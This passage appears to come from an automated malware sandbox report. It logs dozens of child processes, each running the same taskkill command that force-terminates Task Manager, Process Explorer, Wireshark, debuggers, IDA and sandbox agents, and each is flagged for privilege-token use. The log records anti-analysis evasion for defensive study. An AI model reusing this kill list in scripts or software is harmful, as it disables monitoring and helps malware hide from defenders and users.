httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
